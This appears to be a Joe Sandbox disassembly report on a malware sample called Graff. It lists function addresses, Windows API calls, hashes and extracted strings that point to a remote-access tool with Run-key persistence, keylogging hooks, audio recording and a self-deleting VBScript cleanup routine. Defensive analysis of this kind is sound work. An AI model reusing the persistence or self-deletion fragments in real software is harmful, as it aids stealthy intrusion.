Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768

Function 00408DA7 Relevance: 6.2, APIs: 4, Instructions: 206fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00408DAC
FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: FileFind$FirstH_prologNext
String ID:
API String ID: 301083792-0
Opcode ID: dc155c18c12b0cb3343cb07a449583581ec927458741a054b454a601b560221f
Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
Opcode Fuzzy Hash: dc155c18c12b0cb3343cb07a449583581ec927458741a054b454a601b560221f
Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98

Function 00450E6A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58

Function 0043293A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C

Function 00450D42 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4

Strings

<D, xrefs: 00450D47

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: <D
API String ID: 1084509184-3866323178
Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744

Function 00450DDD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29

Strings

<D, xrefs: 00450DE2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: <D
API String ID: 1084509184-3866323178
Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644

Function 00447597 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA

Strings

GetLocaleInfoEx, xrefs: 004475A8, 004475B2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E

Function 004510BA Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99

Function 004512EA Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4

Function 004470AE Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00444ACC: RtlEnterCriticalSection.NTDLL(-00471558), ref: 00444ADB

EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49

Function 00450CF7 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754

Function 0040E679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1

Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
ExitProcess.KERNEL32 ref: 0041151D

Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382

Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
Part of subcall function 004127D5: RegCloseKey.KERNEL32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809

PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B

Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1

Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE

Strings

.exe, xrefs: 0041142F
temp_, xrefs: 0041141D
WDH, xrefs: 00411389, 004114F8
0DG, xrefs: 004112C3
exepath, xrefs: 00411308
@CG, xrefs: 004112E2
T@, xrefs: 00411361
open, xrefs: 0041147D

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
API String ID: 4250697656-2665858469
Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D

Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7

Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3

Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE

ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
ExitProcess.KERNEL32 ref: 0040C63E

Strings

Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0040C2DF
CreateObject("WScript.Shell").Run "cmd /c "", xrefs: 0040C56F
On Error Resume Next, xrefs: 0040C427
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0040C330
Set fso = CreateObject("Scripting.FileSystemObject"), xrefs: 0040C418
`=G, xrefs: 0040C2C9
Temp, xrefs: 0040C3EE
wend, xrefs: 0040C4F7
\update.vbs, xrefs: 0040C3E9
while fso.FileExists(", xrefs: 0040C45A
fso.DeleteFile ", xrefs: 0040C4A8
exepath, xrefs: 0040C365
@CG, xrefs: 0040C33D
fso.DeleteFile(Wscript.ScriptFullName), xrefs: 0040C5E1
fso.DeleteFolder ", xrefs: 0040C519
"), xrefs: 0040C443
""", 0, xrefs: 0040C555
open, xrefs: 0040C62C

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
API String ID: 1861856835-3168347843
Opcode ID: 08624c6c23cbf63ea0ba07d52321b9ee3887e1149360b7442d46b0dcd23f8291
Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
Opcode Fuzzy Hash: 08624c6c23cbf63ea0ba07d52321b9ee3887e1149360b7442d46b0dcd23f8291
Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E

Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
SetEvent.KERNEL32 ref: 0041A38A
WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
CloseHandle.KERNEL32 ref: 0041A3AB
mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7

Strings

stopped, xrefs: 0041A373
status audio mode, xrefs: 0041A368
open ", xrefs: 0041A246
stop audio, xrefs: 0041A3C8
pause audio, xrefs: 0041A33B
resume audio, xrefs: 0041A353
" type , xrefs: 0041A24B
alias audio, xrefs: 0041A22E
play audio, xrefs: 0041A2C1
>G, xrefs: 0041A27F, 0041A1FF
close audio, xrefs: 0041A3D2

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
API String ID: 738084811-1408154895
Opcode ID: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
Instruction ID: 9d48d6c6e0579c1e833a8367b0d02802659df9f73890df0c3e8ff2b6504ede8e
Opcode Fuzzy Hash: 8f16ee43b4cb6b1ec4ac042b243efdd7e82b32275b6d04eeba487ce5541c5dfc
Instruction Fuzzy Hash: 9A51C2712443056AD214BB31DC82EBF3B5CEB91758F10043FF455A21E2EE389D9986AF

Function 00401BE8 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401C7E
WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401C8E
WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401C9E
WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401CAE
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401CBE
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401CCF
WriteFile.KERNEL32(00000000,00471B02,00000002,00000000,00000000), ref: 00401CE0
WriteFile.KERNEL32(00000000,00471B04,00000004,00000000,00000000), ref: 00401CF0
WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401D00
WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42

Strings

data, xrefs: 00401D2C
fmt , xrefs: 00401CA8
WAVE, xrefs: 00401C98
RIFF, xrefs: 00401C78

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$Write$Create
String ID: RIFF$WAVE$data$fmt
API String ID: 1602526932-4212202414
